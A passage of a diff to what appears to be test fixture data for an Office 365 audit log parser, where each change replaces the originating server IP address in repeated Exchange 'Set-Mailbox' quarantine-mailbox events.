bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2264,7 +2264,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2338,7 +2338,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2350,7 +2350,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2424,7 +2424,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2436,7 +2436,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2510,7 +2510,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2522,7 +2522,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2596,7 +2596,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2608,7 +2608,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2682,7 +2682,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2694,7 +2694,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2768,7 +2768,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 